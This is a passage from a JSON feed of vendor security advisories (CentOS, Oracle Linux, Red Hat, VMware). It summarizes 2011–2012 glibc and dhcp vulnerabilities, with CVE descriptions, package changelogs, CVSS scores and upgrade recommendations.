a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to crash\nor, potentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2010-0830)\n\nIt was found that the glibc addmntent() function, used by various mount\nhelper utilities, did not handle certain errors correctly when updating the\nmtab (mounted file systems table) file. If such utilities had the setuid\nbit set, a local attacker could use this flaw to corrupt the mtab file.\n(CVE-2011-1089)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number of\nconnections to an RPC service that is using the RPC implementation from\nglibc, could use this flaw to make that service use an excessive amount of\nCPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The Ubuntu\nSecurity Team acknowledges Dan Rosenberg as the original reporter of\nCVE-2010-0830.\n\nUsers should upgrade to these updated packages, which resolve these issues.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2012-February/030466.html\n\n**Affected packages:**\nglibc\nglibc-common\nglibc-devel\nglibc-headers\nglibc-utils\nnscd\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2012-0126.html", "edition": 3, "modified": "2012-02-14T03:06:54", "published": "2012-02-14T03:06:54", "href": "http://lists.centos.org/pipermail/centos-announce/2012-February/030466.html", "id": "CESA-2012:0126", "title": "glibc, nscd security update", "type": "centos", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-20T18:27:48", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1658", "CVE-2010-0296", "CVE-2011-1659", "CVE-2011-1071", "CVE-2011-1095", "CVE-2010-3847", "CVE-2011-0536"], "description": "**CentOS Errata and Security Advisory** CESA-2011:0412\n\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system cannot\nfunction properly.\n\nThe fix for CVE-2010-3847 introduced a regression in the way the dynamic\nloader expanded the $ORIGIN dynamic string token specified in the RPATH and\nRUNPATH entries in the ELF library header. A local attacker could use this\nflaw to escalate their privileges via a setuid or setgid program using\nsuch a library. (CVE-2011-0536)\n\nIt was discovered that the glibc addmntent() function did not sanitize its\ninput properly. A local attacker could possibly use this flaw to inject\nmalformed lines into /etc/mtab via certain setuid mount helpers, if the\nattacker were allowed to mount to an arbitrary directory under their\ncontrol. (CVE-2010-0296)\n\nIt was discovered that the glibc fnmatch() function did not properly\nrestrict the use of alloca(). If the function was called on sufficiently\nlarge inputs, it could cause an application using fnmatch() to crash or,\npossibly, execute arbitrary code with the privileges of the application.\n(CVE-2011-1071)\n\nIt was discovered that the locale command did not produce properly escaped\noutput as required by the POSIX specification. If an attacker were able to\nset the locale environment variables in the environment of a script that\nperformed shell evaluation on the output of the locale command, and that\nscript were run with different privileges than the attacker's, it could\nexecute arbitrary code with the privileges of the script. (CVE-2011-1095)\n\nAll users should upgrade to these updated packages, which contain\nbackported patches to correct these issues.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2011-April/029335.html\nhttp://lists.centos.org/pipermail/centos-announce/2011-April/029336.html\n\n**Affected packages:**\nglibc\nglibc-common\nglibc-devel\nglibc-headers\nglibc-utils\nnscd\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2011-0412.html", "edition": 5, "modified": "2011-04-14T13:51:19", "published": "2011-04-14T13:51:19", "href": "http://lists.centos.org/pipermail/centos-announce/2011-April/029335.html", "id": "CESA-2011:0412", "title": "glibc, nscd security update", "type": "centos", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:38:14", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4609", "CVE-2010-0296", "CVE-2011-1659", "CVE-2010-0830", "CVE-2011-1071", "CVE-2011-1095", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "description": "[2.3.4-2.57]\n- Use malloc as needed in fnmatch (#769360)\n[2.3.4-2.56]\n- Fix handling if newline in addmntent (#769360)\n- Use correct type when casting d_tag (#769360).\n- Properly quite output of local (#769360)\n- Check size of pattern in wide character representation in fnmatch (#769360)\n- Report write error in addmnt even for cached streams (#769360)\n- ldd: Never run file directly (#769360).\n- Check values from TZ file header (#767685)\n- Workaround misconfigured system (#767685)\n[2.3.4-2.55]\n- Require exact glibc version in nscd (#657009)", "edition": 4, "modified": "2012-02-13T00:00:00", "published": "2012-02-13T00:00:00", "id": "ELSA-2012-0125", "href": "http://linux.oracle.com/errata/ELSA-2012-0125.html", "title": "glibc security and bug fix update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:23", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4609", "CVE-2010-0830", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "description": "[2.5-65.el5_7.3]\n- Use correct type when casting d_tag (#767687)\n- Report write error in addmnt even for cached streams (#767687)\n- ldd: Never run file directly (#767687).\n- Workaround misconfigured system (#767687)\n[2.5-65.el5_7.2]\n- Check values from TZ file header (#767687)", "edition": 4, "modified": "2012-02-13T00:00:00", "published": "2012-02-13T00:00:00", "id": "ELSA-2012-0126", "href": "http://linux.oracle.com/errata/ELSA-2012-0126.html", "title": "glibc security update", "type": "oraclelinux", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:11", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1658", "CVE-2010-0296", "CVE-2011-1659", "CVE-2011-1071", "CVE-2011-1095", "CVE-2011-0536"], "description": "[2.5-58.el5_6.2]\n- Avoid too much stack use in fnmatch (#681054, CVE-2011-1071)\n- Properly quote output of locale (#625893, CVE-2011-1095)\n- Don't leave empty element in rpath when skipping the first element,\n ignore rpath elements containing non-isolated use of when\n privileged (#667974, CVE-2011-0536)\n- Fix handling of newline in addmntent (#559579, CVE-2010-0296)\n[2.5-58.el5_6.1]\n- Don't ignore in libraries (#682991)", "edition": 4, "modified": "2011-04-04T00:00:00", "published": "2011-04-04T00:00:00", "id": "ELSA-2011-0412", "href": "http://linux.oracle.com/errata/ELSA-2011-0412.html", "title": "glibc security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:46:15", "bulletinFamily": "unix", "cvelist": ["CVE-2009-5029", "CVE-2009-5064", "CVE-2010-0296", "CVE-2010-0830", "CVE-2011-1071", "CVE-2011-1089", "CVE-2011-1095", "CVE-2011-1659", "CVE-2011-4609"], "description": "The glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system cannot\nfunction properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked against\nglibc, it could cause the application to crash or, potentially, execute\narbitrary code with the privileges of the user running the application.\n(CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically linked\nlibraries. If an attacker could trick a user into running ldd on a\nmalicious binary, it could result in arbitrary code execution with the\nprivileges of the user running ldd. (CVE-2009-5064)\n\nIt was discovered that the glibc addmntent() function, used by various\nmount helper utilities, did not sanitize its input properly. A local\nattacker could possibly use this flaw to inject malformed lines into the\nmtab (mounted file systems table) file via certain setuid mount helpers, if\nthe attacker were allowed to mount to an arbitrary directory under their\ncontrol. (CVE-2010-0296)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to crash\nor, potentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2010-0830)\n\nIt was discovered that the glibc fnmatch() function did not properly\nrestrict the use of alloca(). If the function was called on sufficiently\nlarge inputs, it could cause an application using fnmatch() to crash or,\npossibly, execute arbitrary code with the privileges of the application.\n(CVE-2011-1071)\n\nIt was found that the glibc addmntent() function, used by various mount\nhelper utilities, did not handle certain errors correctly when updating the\nmtab (mounted file systems table) file. If such utilities had the setuid\nbit set, a local attacker could use this flaw to corrupt the mtab file.\n(CVE-2011-1089)\n\nIt was discovered that the locale command did not produce properly escaped\noutput as required by the POSIX specification. If an attacker were able to\nset the locale environment variables in the environment of a script that\nperformed shell evaluation on the output of the locale command, and that\nscript were run with different privileges than the attacker's, it could\nexecute arbitrary code with the privileges of the script. (CVE-2011-1095)\n\nAn integer overflow flaw was found in the glibc fnmatch() function. If an\nattacker supplied a long UTF-8 string to an application linked against\nglibc, it could cause the application to crash. (CVE-2011-1659)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number of\nconnections to an RPC service that is using the RPC implementation from\nglibc, could use this flaw to make that service use an excessive amount of\nCPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The Ubuntu\nSecurity Team acknowledges Dan Rosenberg as the original reporter of\nCVE-2010-0830.\n\nThis update also fixes the following bug:\n\n* When using an nscd package that is a different version than the glibc\npackage, the nscd service could fail to start. This update makes the nscd\npackage require a specific glibc version to prevent this problem.\n(BZ#657009)\n\nUsers should upgrade to these updated packages, which resolve these issues.\n", "modified": "2017-09-08T12:12:17", "published": "2012-02-13T05:00:00", "id": "RHSA-2012:0125", "href": "https://access.redhat.com/errata/RHSA-2012:0125", "type": "redhat", "title": "(RHSA-2012:0125) Moderate: glibc security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:55", "bulletinFamily": "unix", "cvelist": ["CVE-2009-5029", "CVE-2009-5064", "CVE-2010-0830", "CVE-2011-1089", "CVE-2011-4609"], "description": "The glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system cannot\nfunction properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked against\nglibc, it could cause the application to crash or, potentially, execute\narbitrary code with the privileges of the user running the application.\n(CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically linked\nlibraries. If an attacker could trick a user into running ldd on a\nmalicious binary, it could result in arbitrary code execution with the\nprivileges of the user running ldd. (CVE-2009-5064)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to crash\nor, potentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2010-0830)\n\nIt was found that the glibc addmntent() function, used by various mount\nhelper utilities, did not handle certain errors correctly when updating the\nmtab (mounted file systems table) file. If such utilities had the setuid\nbit set, a local attacker could use this flaw to corrupt the mtab file.\n(CVE-2011-1089)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number of\nconnections to an RPC service that is using the RPC implementation from\nglibc, could use this flaw to make that service use an excessive amount of\nCPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The Ubuntu\nSecurity Team acknowledges Dan Rosenberg as the original reporter of\nCVE-2010-0830.\n\nUsers should upgrade to these updated packages, which resolve these issues.\n", "modified": "2017-09-08T12:08:12", "published": "2012-02-13T05:00:00", "id": "RHSA-2012:0126", "href": "https://access.redhat.com/errata/RHSA-2012:0126", "type": "redhat", "title": "(RHSA-2012:0126) Moderate: glibc security update", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T13:31:28", "bulletinFamily": "unix", "cvelist": ["CVE-2010-0296", "CVE-2010-3847", "CVE-2011-0536", "CVE-2011-1071", "CVE-2011-1095", "CVE-2011-1658", "CVE-2011-1659"], "description": "The glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system cannot\nfunction properly.\n\nThe fix for CVE-2010-3847 introduced a regression in the way the dynamic\nloader expanded the $ORIGIN dynamic string token specified in the RPATH and\nRUNPATH entries in the ELF library header. A local attacker could use this\nflaw to escalate their privileges via a setuid or setgid program using\nsuch a library. (CVE-2011-0536)\n\nIt was discovered that the glibc addmntent() function did not sanitize its\ninput properly. A local attacker could possibly use this flaw to inject\nmalformed lines into /etc/mtab via certain setuid mount helpers, if the\nattacker were allowed to mount to an arbitrary directory under their\ncontrol. (CVE-2010-0296)\n\nIt was discovered that the glibc fnmatch() function did not properly\nrestrict the use of alloca(). If the function was called on sufficiently\nlarge inputs, it could cause an application using fnmatch() to crash or,\npossibly, execute arbitrary code with the privileges of the application.\n(CVE-2011-1071)\n\nIt was discovered that the locale command did not produce properly escaped\noutput as required by the POSIX specification. If an attacker were able to\nset the locale environment variables in the environment of a script that\nperformed shell evaluation on the output of the locale command, and that\nscript were run with different privileges than the attacker's, it could\nexecute arbitrary code with the privileges of the script. (CVE-2011-1095)\n\nAll users should upgrade to these updated packages, which contain\nbackported patches to correct these issues.\n", "modified": "2017-09-08T11:56:16", "published": "2011-04-04T04:00:00", "id": "RHSA-2011:0412", "href": "https://access.redhat.com/errata/RHSA-2011:0412", "type": "redhat", "title": "(RHSA-2011:0412) Important: glibc security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "vmware": [{"lastseen": "2019-11-06T16:05:42", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1658", "CVE-2010-0296", "CVE-2011-1659", "CVE-2011-0997", "CVE-2011-1071", "CVE-2011-1095", "CVE-2011-0536"], "description": "a. Service Console update for DHCP \nThe DHCP client daemon, dhclient, does not properly sanatize certain options in DHCP server replies. An attacker could send a specially crafted DHCP server reply, that is saved on the client system and evaluated by a process that assumes the option is trusted. This could lead to arbitrary code execution with the privileges of the evaluating process. \nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2011-0997 to this issue. \nColumn 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available. \n\n", "edition": 4, "modified": "2012-03-08T00:00:00", "published": "2011-07-28T00:00:00", "id": "VMSA-2011-0010", "href": "https://www.vmware.com/security/advisories/VMSA-2011-0010.html", "title": "VMware ESX third party updates for Service Console packages glibc and dhcp", "type": "vmware", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
